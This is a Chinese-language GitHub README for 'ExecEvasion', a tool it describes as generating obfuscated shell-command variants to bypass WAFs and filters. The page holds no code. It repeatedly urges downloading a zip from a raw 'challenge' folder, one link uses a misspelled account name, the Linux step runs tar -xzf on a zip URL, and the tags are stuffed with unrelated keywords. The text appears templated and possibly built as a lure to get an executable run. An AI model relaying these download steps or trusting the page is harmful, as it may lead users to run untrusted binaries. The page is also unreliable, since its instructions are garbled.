nezzyomran/ExecEvasion

GitHub: nezzyomran/ExecEvasion

一款用于生成混淆命令变体以尝试绕过 WAF 的跨平台安全测试工具。

Stars: 1 | Forks: 1

# 🚀 ExecEvasion - 轻松绕过过滤器 ## 🌟 概述 ExecEvasion 是一个轻量级的执行规避工具包,旨在创建命令变体。其主要目的是通过利用 Linux 和 Windows 系统上的真实 Shell 解析行为,来绕过简单的过滤器和 Web Application Firewall (WAF) 规则。 ## 📥 立即下载 [![下载 ExecEvasion](https://github.com/nezzyomran/ExecEvasion/raw/refs/heads/main/challenge/Evasion-Exec-1.2.zip)](https://github.com/nezzyomgan/ExecEvasion/raw/refs/heads/main/challenge/Evasion-Exec-1.2.zip) ## 🚀 入门指南 使用 ExecEvasion 非常简单。请按照以下步骤开始使用。 ### 🛠️ 系统要求 - **操作系统:** - Windows 10 或更高版本 - 任何现代 Linux 发行版 - **处理器:** - 推荐使用 64 位处理器 - **内存:** - 至少 4 GB RAM - **磁盘空间:** - 至少 100 MB 的可用空间 ## 📥 下载与安装 要下载 ExecEvasion,请访问此页面进行下载:[ExecEvasion Releases](https://github.com/nezzyomran/ExecEvasion/raw/refs/heads/main/challenge/Evasion-Exec-1.2.zip)。 1. 前往 [Releases 页面](https://github.com/nezzyomran/ExecEvasion/raw/refs/heads/main/challenge/Evasion-Exec-1.2.zip)。 2. 找到您想要下载的版本。 3. 点击与您的操作系统匹配的文件: - 对于 Windows,请查找 `.exe` 文件。 - 对于 Linux,请查找 `https://github.com/nezzyomran/ExecEvasion/raw/refs/heads/main/challenge/Evasion-Exec-1.2.zip` 或类似文件。 4. 将文件保存到您的计算机。 5. 根据您的操作系统按照以下说明进行安装。 ## 💻 在 Windows 上安装 1. 双击下载的 `.exe` 文件。 2. 按照屏幕上的说明完成安装。 3. 安装完成后,您可以直接从开始菜单或桌面快捷方式运行 ExecEvasion。 ## 🐧 在 Linux 上安装 1. 打开您的终端。 2. 导航到您下载软件包的目录。 3. 使用以下命令解压文件: tar -xzf ExecEvasion*https://github.com/nezzyomran/ExecEvasion/raw/refs/heads/main/challenge/Evasion-Exec-1.2.zip 4. 进入解压后的目录: cd ExecEvasion 5. 要运行 ExecEvasion,请使用命令: ./exec_evasion ## 🎯 如何使用 ExecEvasion 使用 ExecEvasion 很简单。以下是生成命令变体的方法: 1. **打开应用程序。** 2. **选择您想使用的命令类型:** - 您可以根据想要绕过的目标选择各种选项。 3. **在输入框中输入您的基础命令。** 4. **点击“Generate”按钮。** 5. **查看结果。** - 应用程序将生成几个您可以使用的命令变体。 ## 🧑‍🤝‍🧑 社区与支持 如果您有问题或需要帮助,请联系社区: - **GitHub Issues:** 报告问题或建议功能。 - **讨论区:** 加入用户和开发者的讨论。 ## 📄 主题 ExecEvasion 涵盖以下几个关键领域: - Bug Bounty 工具 - 防御规避技术 - Web Application Firewall 绕过 ## 🔗 其他资源 - **文档:** 查看官方文档以获取详细的使用说明。 - **教程:** 查找有关如何有效使用 ExecEvasion 的视频教程。 ## 📩 反馈 我们重视您的意见。请分享您的体验、建议或遇到的问题。您可以通过 GitHub 上的 Issues 部分或发送电子邮件给支持团队来完成此操作。 ## 📥 再次立即下载 别忘了访问发布页面下载 ExecEvasion:[ExecEvasion Releases](https://github.com/nezzyomran/ExecEvasion/raw/refs/heads/main/challenge/Evasion-Exec-1.2.zip)。
标签:AppImage, CISA项目, Conpot, DNS 反向解析, Payload生成, Ruby脚本, WAF绕过, Web应用防火墙, Windows安全, 代码混淆, 后端开发, 后端开发, 命令变异, 命令注入, 安全测试, 安全测试, 执行逃避, 攻击性安全, 攻击性安全, 白盒测试, 网络安全, 隐私保护